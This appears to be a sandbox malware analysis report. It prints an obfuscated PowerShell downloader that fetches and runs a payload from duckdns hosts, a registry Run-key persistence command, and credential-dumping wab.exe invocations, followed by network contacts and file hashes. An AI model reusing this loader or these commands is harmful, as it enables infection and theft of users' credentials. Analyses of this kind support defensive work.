ntatFjernskiOleifernS,bstitsDiskva,=Preappe(ForvariTTomefuleExsectisChemophtEkvivok-PerduraP Samme aTranseqtF,rstrah Underg Detai l$SnkendeU Kal,kadP.oselylForktr,bc,nsumesHackersdcheckreaFaenometLovgi.no Zoo.eoeP etortnChaussfsantigra)Madrepo ');while (!$Caryotins) {Skuffemblers80 (Pugmiller27 'svineml$PirraurgBlas,rtlToldasso MarkrkbVariabeaCrassesl Udbeta:L.ppingEBeskuerkLu ningsSuba.paeBesty,emKunstkreWood,nltOmkldnis Fasci,=Bitters$.recooktSef kherBrandfouDgnmiddeFlels,s ') ;Skuffemblers80 $Tripotassium;Skuffemblers80 (Pugmiller27 'BugtedeSUnshaketGlanslsaHalberdrChaptalt.eposit- M chanSDyrtidslChyometeFimredeeEuorn,tp Ju,jub .frika4Optakts ');Skuffemblers80 (Pugmiller27 'Vandfor$TophuengLaconislDaysmeno GravhubGaintw,aHandbagl.igsadv:rrd.ummCStokerfaHeltenerLoranthyI.stalsoSammensttakstt.iRose.ben Unja ks P.ssma=Festrem(Bon efdTL,tfrdieFdevandsRv.ulletSkr ebl-UnassimP FormataYa.nerutauthorihBestemm Uninvag$InterpuUBathyspdudtrakdlHafterabElectros SeksaadStavlygaMilieu t ceneguoPrintm ePsykolonPred.spsAmorphi)Goldles ') ;Skuffemblers80 (Pugmiller27 'Lascivi$BlrenddgreusinglS,kterioHandlinb milliaa OmlgnilInterli:G eywarM.tdtrinaUdfrienrBullrags Briti h lomstmgatherfaMundat,nSemidom=Varnish$LeasinggScleroxlcompeteo ResaddbComplicaSpringbl Ko.sta:O.vejenBdisloadesto ebemImi ereospolet cObvia ikUnneedfeFunktiodCharc a+dehydre+Sovi ti%Immunes$BombardIAnge.linEhe,intdFolkboasBlousoneAnbefaln OptionsMisfie .l,kkericOrdtllioNattyfou atteagnLign ngtUigenne ') ;$Klippespalternes=$Indsens[$Marshman];}$Agonize=339107;$Simonies=30148;Skuffemblers80 (Pugmiller27 'Forlodc$T,rhildgRetrosplPolituro Undissb Ta,ernaShunpiklEngangs:RegenerUVgterpid lvfadm UdestorSrskrevkC lletyeIlliberl FlusmisDribleneKnibninnPedicel onaff=,oughta EverypG TrepaneNa.nemrtomphali- PonyerCbaggrunoBron efn C.rcumtSkrinlgeLarmedenfeberantKonst u Din.eno$UsurpatUAnkec.edForsatslOverflybrebokeasUnderstd Thiocya FrugivtMort,nsoCirrouseSamf,ndnG llaunsReagens ');Skuffemblers80 (Pugmiller27 'Rendezv$FiskestgScabblelKi esiooCae.arobFremskraVrikkerlLocater:TiggersqKontaktuStivelsoSutton,hSr,ilfloP,oduktg EvakuesChenea Reform=Instruk Forvaer[ PiscinSPleske.y Sombr sDemiskrtFodbreme LuggnamPost ox.OktanteCKv.rtetoFakturan.appeskvagariste statsgr ,ockettPlanlg.]Ga.rden:Tr oxaz:AbortioFTaabelirS bunguoInviolamOrtograBAthwarta fo,plisfir,steeUnfle,h6kope sa4 DialekSPuller t SigtekrBaggruniUnmaturnfrkapseg Iridin(Edder,o$Udlaan UGasserndPadouksmGrankogrJoeyshjkStemmeaeOutequilShillins Hy.ereeGetat,bnIndl.dt)Post or ');Skuffemblers80 (Pugmiller27 'Vowersk$ MeteorgSwankeyl BarbecoBe,iggebD,provia BalefulAutecol:P,emenoVTvr agseTysklanrArbejdsiFlaskehf Gaeld iNostradcLejeforeUnd.ferrMysticieRelik.irSax rne preio,i=Krepere Johnni,[KaalpaySPac.walyPromercsSkralunt dyrti,eAdditiomOssicul.sperminTGrothinePoly,ynxOctahedt opfind. Ko,torE SilentnFaradaycEpichoroUnexplod Unshari,vakuernFstendegNonchem]Grsrdde:Cardio,:BeskftiABaptistSBronchiC A ekseIOrlopdeISelvval. AlperoGTheow ee edagetUnblissSDob eltthjsangerNemmendiLod,ensnBrdteksgNor.eni(Hum.ris$Verna.uqSeaportu MicropoSvalinghSpl tteoBourgeogOrganiss Kontak)Kogespr ');Skuffemblers80 (Pugmiller27 'Jomsvi $videoplgReshuttlC remono SpolnibRooflinaFimre,elLastvog:PrinterAA,nsofin SkistatThenna.iBritas cRulammeiEdiblesvCivilisi Ch,orol Skuldr= Laanem$Salad nVHematozeMendicarRhabditiByggemof HuanaciProgrescSkummeteRaakalvrapert.reUngamblrSnobbis. Rel stsMiteredu N.drivb VoldtgsRee,ucatadmin,sr Reocc,iAarsagsnCommissgMantraf(,nlarge$ FeatheA Heterog fono.ooani,idinSkulpefiPlausibz S mmete betonk,Honilyj$FrostieSHuma.eaidattosrmhandf.sotolversnIrreguliSinistre RadiossPantheo)Jola,ta ');Skuffemblers80 $Anticivil;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Dokumentationsniveaus = 1;$Hjemegn='Sub';$Hjemegn+='strin';$Hjemegn+='g';Function Pugmiller27($Afficerer){$Fjaserierne=$Afficerer.Length-$Dokumentationsniveaus;For($Semimythically=7;$Semimythically -lt $Fjaserierne;$Semimythically+=8){$Formidabel+=$Afficerer.$Hjemegn.Invoke( $Semimythically, $Dokumentationsniveaus);}$Formidabel;}function Skuffemblers80($Nundination){& ($Fiberizes) ($Nundination);}$Riches=Pugmiller27 'Unfea iMGert,udote.zinazidemndeiSkulderlKejserelKullereaM,squaw/ ranule5Uv.denh.Indsigt0 Teapoy Apsisex(ForsamlWVermicuiNrbanekn Opkal,d SkoleeoD.pnoouwDe.icatsBrushwo PreintoNBnkeradTSurdent Unceles1Tyndta.0Sco,ogg. Drm ea0Interwr; Papegj U.kikkeWPresse iBaggingnPhenopl6Moskgae4Rystnin;Cor.ado EnteroxProgram6Fleligt4Sco nin; Minesw Trif.crU,ikresvIffritt:Gigoloe1 fdestu2Dreamer1Skridso. Stoppe0 rg jle)Diatom. Biog.apGDrivbnkeDietalacTonkawakParenteoAdditum/Anjo mo2A.rmong0Bayrern1hypotak0befordr0Sabb,ti1Eksamen0Teltsla1Seksten UdvideFattraktiChol.dorDrawcaneStrmperfIffcoluoT dstavxAmphict/Coe.uca1Geologi2Discipl1App,rte. Job,gn0D.hydro ';$hermae=Pugmiller27 'CivilisUBefohsfsBjergtoeBe,onkorforlyst-DykkedeAForflytgVicedireKassatin vsprintFllesud ';$Klippespalternes=Pugmiller27 'Recoillh StringtPist rstMercer pUninfri:Fright./tel mec/BrabblimWrannyfa LinenidPogoniaiOver apbBeraabea,lirtatrAn.iqueoMellemrhNonfluii.mpalealPejlevoaTermin lArithmoa Cari.ot BellahwTidssero Harpoo.VanddradPennefjuIsocy ncPaakldek Moorhed Selvbyn.sentrosMessing.Sele,ogomarkedsr Arti egKuldslo/L,vetraaOverspelMa,nedsl Fo,bru/ChristeOreassumvForgr beTikroner ethavepFoilingrBilophuoHar isttPrivataeUnkindlcDieucontTetraheeVilipendAuto.at.BrtternaPaduanisHurtigvdKnownsb>grundprhUnsu,pltReaffiltFreewompDren hesPamphar: Optje./ Kendin/Rigsar.csolilo a HelgesdFranckceLatinamnMundgodaOvercledcutleriePi,dymcr Forstre Vandfog Allitea.mhyggelHen,ikkoDiatonisGunsh t.IsagogicHortikuoKorskirm Fortri/HelmintO SamlinvIsoc ateForbo.sr kursusp Alc horDi,konioParopsitBrokkaseRegrassc KlebrntVaccinaeAchigandDmninge. DiskanaBal,erdsDampededMisc nc ';$Indeksnavnenes=Pugmiller27 'Horeu,g> Neckb. ';$Fiberizes=Pugmiller27 ' AsperiiUnderlaeUdslusax.ialogu ';$unfashionably='Underste';$Ndringsloven = Pugmiller27 'VernacueAntistrcFornufthKu.isshoEstabli Unlamen%YvindasaAfstr.spEvaporapFirspand K shmia CircumtStalagmaSolvarm%trichin\T gthusDFestdagrOuttopiothackerh Dronis.G.ggereL Bem.leiKonsul tDisbury Mimusop&unjo tl& Unrefr ExclusieP,ovedicPa aesthPholioto Boroca NonmanutHousebo ';Skuffemblers80 (Pugmiller27 ' Brevve$Sibyllig E.keltlasylth,oBo.genebAphanesaNonm.rrlstedfas: sermonRHjemvisaErgotizaTyp,husgPastelfeBrightnr BravoenSold teeOwl ike=unplaya(Overcolc mbitiomPaternid,ersali Idealit/ Sprackc tekedy Westli$System.NPhotomud registrDetermiiPistrixnTr.thsmgTomensvsThu.nidltilkendoSkarnbtvStyrekae.andelsn.ongres)R.ndvis ');Skuffemblers80 (Pugmiller27 'Gullery$BasilikgOntologll enabloMembranbCommulaaReprodulHjarnea:RuefulnI SaxaulnSkyd.spdBrugerdsDyrepareParkerinKbenhavs astodo=St dent$WummanaKU,etemallasterni.mutterpfam,etcpObjektke ApoteksS miwoopHolishkaPh tolalovergo,tFlberieeThirtyirMinisten,rydreheKn.vsmesNeder.e.AlarmsysChrist.pSt rgeolWhiteshiPr endetProsaen(Menings$K.lkulaIKvadratnIn.ectid AnteceeNonascekDigitissFortrngnPicturiaudbruddv SpulinnReguarde Positin Mowedee,pachets,acefor)Affodre ');$Klippespalternes=$Indsens[0];$Konstantnavn= (Pugmiller27 ',yrebes$Beboedeg A,rsoplObtestioLnniveab C ntriaHerm.lil Dr.van:K igsmaK Rec mpaDuksedrmBroekdee ,nderueFolk,krnApprokssWaiseja=OtogeniNSpi ekkeLangeelw T.angs-FlleskoOAlmachsb Raspedj SkittleKillybecKi,debatJordarv .dresseS i.deteyAgrologsJagterntSemiboue HissermSlu bet. SubfesNSubemareOmraadetSaliggr.UniseriWsh pyareOxytocib W stelCUneve,tlArkfdniiDaasellehave.usnreptilit');$Konstantnavn+=$Raagerne[1];Skuffemblers80 ($Konstantnavn);Skuffemblers80 (Pugmiller27 'Geother$W,odburKIntercaaSpytkirmMusicaleFormalieStoppegn,uperdesdiminut.snevejrHSammenseRewrit,a Nonundd Unskele Gtefolr brusqusSkattep[Desa in$C.rrupthOmbreudePlemoc,r Dobbelm DisomaaCalandeeIndif e]Saltant= Tri ul$Cons,raR krdderiSouthercPrognoshTe,moeleHalvakssMe.amor ');$Tripotassium=Pugmiller27 ' Pakist$NondecaKSpidsfiaComm.ndmEpriseteCorrespe MysticnTekstilsfkalieo.Beb,erdDUn,roroospan,shwWallisen JennielSelvbedoBrndvrdaInversedevadingFf stooniTrst.splGaulicwe.versig(grubers$Sad lecKM oledelH.lvstui krep,apGipsdeppJugglineGodken,sAngelinpScund ra SinterlRaffeeptOxamidie Gr.vkerBelaaninSugefiseIndrmmes Convey,Pupilla$ ,udekoUN.kedrmdUnabusilTilgodebBodenbesM.ddeltd Forjuda VasenbtAphrasioSprydsteUdsoninnVederhfsPloejer) Colpoh ';$Udlbsdatoens=$Raagerne[0];Skuffemblers80 (Pugmiller27 'Nabobye$UnsandagNonuncil OverdioKurs ikbtrianguaFore.oolBu dend:Aa.ningCLatou.saTempelrrI,ternayNonmen o Sp ntatFjernskiOleifernS,bstitsDiskva,=Preappe(ForvariTTomefuleExsectisChemophtEkvivok-PerduraP Samme aTranseqtF,rstrah Underg Detai l$SnkendeU Kal,kadP.oselylForktr,bc,nsumesHackersdcheckreaFaenometLovgi.no Zoo.eoeP etortnChaussfsantigra)Madrepo ');while (!$Caryotins) {Skuffemblers80 (Pugmiller27 'svineml$PirraurgBlas,rtlToldasso MarkrkbVariabeaCrassesl Udbeta:L.ppingEBeskuerkLu ningsSuba.paeBesty,emKunstkreWood,nltOmkldnis Fasci,=Bitters$.recooktSef kherBrandfouDgnmiddeFlels,s ') ;Skuffemblers80 $Tripotassium;Skuffemblers80 (Pugmiller27 'BugtedeSUnshaketGlanslsaHalberdrChaptalt.eposit- M chanSDyrtidslChyometeFimredeeEuorn,tp Ju,jub .frika4Optakts ');Skuffemblers80 (Pugmiller27 'Vandfor$TophuengLaconislDaysmeno GravhubGaintw,aHandbagl.igsadv:rrd.ummCStokerfaHeltenerLoranthyI.stalsoSammensttakstt.iRose.ben Unja ks P.ssma=Festrem(Bon efdTL,tfrdieFdevandsRv.ulletSkr ebl-UnassimP FormataYa.nerutauthorihBestemm Uninvag$InterpuUBathyspdudtrakdlHafterabElectros SeksaadStavlygaMilieu t ceneguoPrintm ePsykolonPred.spsAmorphi)Goldles ') ;Skuffemblers80 (Pugmiller27 'Lascivi$BlrenddgreusinglS,kterioHandlinb milliaa OmlgnilInterli:G eywarM.tdtrinaUdfrienrBullrags Briti h lomstmgatherfaMundat,nSemidom=Varnish$LeasinggScleroxlcompeteo ResaddbComplicaSpringbl Ko.sta:O.vejenBdisloadesto ebemImi ereospolet cObvia ikUnneedfeFunktiodCharc a+dehydre+Sovi ti%Immunes$BombardIAnge.linEhe,intdFolkboasBlousoneAnbefaln OptionsMisfie .l,kkericOrdtllioNattyfou atteagnLign ngtUigenne ') ;$Klippespalternes=$Indsens[$Marshman];}$Agonize=339107;$Simonies=30148;Skuffemblers80 (Pugmiller27 'Forlodc$T,rhildgRetrosplPolituro Undissb Ta,ernaShunpiklEngangs:RegenerUVgterpid lvfadm UdestorSrskrevkC lletyeIlliberl FlusmisDribleneKnibninnPedicel onaff=,oughta EverypG TrepaneNa.nemrtomphali- PonyerCbaggrunoBron efn C.rcumtSkrinlgeLarmedenfeberantKonst u Din.eno$UsurpatUAnkec.edForsatslOverflybrebokeasUnderstd Thiocya FrugivtMort,nsoCirrouseSamf,ndnG llaunsReagens ');Skuffemblers80 (Pugmiller27 'Rendezv$FiskestgScabblelKi esiooCae.arobFremskraVrikkerlLocater:TiggersqKontaktuStivelsoSutton,hSr,ilfloP,oduktg EvakuesChenea Reform=Instruk Forvaer[ PiscinSPleske.y Sombr sDemiskrtFodbreme LuggnamPost ox.OktanteCKv.rtetoFakturan.appeskvagariste statsgr ,ockettPlanlg.]Ga.rden:Tr oxaz:AbortioFTaabelirS bunguoInviolamOrtograBAthwarta fo,plisfir,steeUnfle,h6kope sa4 DialekSPuller t SigtekrBaggruniUnmaturnfrkapseg Iridin(Edder,o$Udlaan UGasserndPadouksmGrankogrJoeyshjkStemmeaeOutequilShillins Hy.ereeGetat,bnIndl.dt)Post or ');Skuffemblers80 (Pugmiller27 'Vowersk$ MeteorgSwankeyl BarbecoBe,iggebD,provia BalefulAutecol:P,emenoVTvr agseTysklanrArbejdsiFlaskehf Gaeld iNostradcLejeforeUnd.ferrMysticieRelik.irSax rne preio,i=Krepere Johnni,[KaalpaySPac.walyPromercsSkralunt dyrti,eAdditiomOssicul.sperminTGrothinePoly,ynxOctahedt opfind. Ko,torE SilentnFaradaycEpichoroUnexplod Unshari,vakuernFstendegNonchem]Grsrdde:Cardio,:BeskftiABaptistSBronchiC A ekseIOrlopdeISelvval. AlperoGTheow ee edagetUnblissSDob eltthjsangerNemmendiLod,ensnBrdteksgNor.eni(Hum.ris$Verna.uqSeaportu MicropoSvalinghSpl tteoBourgeogOrganiss Kontak)Kogespr ');Skuffemblers80 (Pugmiller27 'Jomsvi $videoplgReshuttlC remono SpolnibRooflinaFimre,elLastvog:PrinterAA,nsofin SkistatThenna.iBritas cRulammeiEdiblesvCivilisi Ch,orol Skuldr= Laanem$Salad nVHematozeMendicarRhabditiByggemof HuanaciProgrescSkummeteRaakalvrapert.reUngamblrSnobbis. Rel stsMiteredu N.drivb VoldtgsRee,ucatadmin,sr Reocc,iAarsagsnCommissgMantraf(,nlarge$ FeatheA Heterog fono.ooani,idinSkulpefiPlausibz S mmete betonk,Honilyj$FrostieSHuma.eaidattosrmhandf.sotolversnIrreguliSinistre RadiossPantheo)Jola,ta ');Skuffemblers80 $Anticivil;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ckqp"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\nevhszl"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xgiatrwwao"

Network

Country Destination Domain Proto
US 8.8.8.8:53 6777.6777.6777.677e udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 madibarohilalatwo.duckdns.org udp
DE 84.247.187.12:80 madibarohilalatwo.duckdns.org tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 12.187.247.84.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 cadenaderegalos.com udp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 8.8.8.8:53 125.68.49.198.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 odogwuvisual123.duckdns.org udp
SG 206.123.138.32:6767 odogwuvisual123.duckdns.org tcp
US 8.8.8.8:53 32.138.123.206.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
SG 206.123.138.32:6767 odogwuvisual123.duckdns.org tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 137.71.105.51.in-addr.arpa udp

Files

memory/1556-0-0x00007FF9F8B43000-0x00007FF9F8B45000-memory.dmp

memory/1556-10-0x0000015C111D0000-0x0000015C111F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3q0im1hw.zzu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1556-11-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp

memory/1556-12-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp

memory/4900-15-0x0000000004840000-0x0000000004876000-memory.dmp

memory/4900-16-0x0000000004FE0000-0x0000000005608000-memory.dmp

memory/4900-17-0x0000000004FA0000-0x0000000004FC2000-memory.dmp

memory/4900-18-0x0000000005740000-0x00000000057A6000-memory.dmp

memory/4900-19-0x00000000057B0000-0x0000000005816000-memory.dmp

memory/4900-29-0x0000000005820000-0x0000000005B74000-memory.dmp

memory/4900-30-0x0000000005E20000-0x0000000005E3E000-memory.dmp

memory/4900-31-0x0000000005E40000-0x0000000005E8C000-memory.dmp

memory/4900-32-0x00000000076A0000-0x0000000007D1A000-memory.dmp

memory/4900-33-0x0000000006380000-0x000000000639A000-memory.dmp

memory/4900-34-0x00000000070C0000-0x0000000007156000-memory.dmp

memory/4900-35-0x0000000007050000-0x0000000007072000-memory.dmp

memory/4900-36-0x00000000082D0000-0x0000000008874000-memory.dmp

C:\Users\Admin\AppData\Roaming\Droh.Lit

MD5 1a958060ba3e3de4653959fe2fd1efd5
SHA1 c5d3a5646dc5920668f1f61c334c7c7d40c888b5
SHA256 268dacbaea80bdf0e4ffcbcf21ce4558988d4c77f2906d571a5a1b9db9dc17ab
SHA512 8ba4e481b0a08940a5423abc5d1e7ffa01e4aa185536af215a43e5d28ee025f5caf5355514b2a13f0565c42796e1bd864104878d79d086a82648b0733929c5d0

memory/4900-38-0x0000000008880000-0x000000000B149000-memory.dmp

memory/1556-39-0x00007FF9F8B43000-0x00007FF9F8B45000-memory.dmp

memory/1556-40-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp

memory/1556-48-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp

memory/2160-45-0x00000000016B0000-0x0000000003F79000-memory.dmp

memory/4924-52-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2256-56-0x0000000000400000-0x0000000000462000-memory.dmp

memory/4924-57-0x0000000000400000-0x0000000000478000-memory.dmp

memory/1204-60-0x0000000000400000-0x0000000000424000-memory.dmp

memory/1204-59-0x0000000000400000-0x0000000000424000-memory.dmp

memory/1204-58-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2256-55-0x0000000000400000-0x0000000000462000-memory.dmp

memory/4924-54-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2256-53-0x0000000000400000-0x0000000000462000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ckqp

MD5 8651f1ecc401fe73c45d06863467d144
SHA1 0150ba4649afe382ae1705552473bba7beb990f4
SHA256 51827e101e890667e6d9b8aa7b804d56b53cadc110b5b8b834229788c29a65e8
SHA512 c0b371d9080c0e82adae100a9400bb7bd239cfe243c072dde0f9310524b92d16a10db9117403d8af227cef9def552dba7c04da3b3bd46a88836acc071cb9890f

memory/2160-66-0x000000001FFE0000-0x000000001FFF9000-memory.dmp

memory/2160-70-0x000000001FFE0000-0x000000001FFF9000-memory.dmp

memory/2160-69-0x000000001FFE0000-0x000000001FFF9000-memory.dmp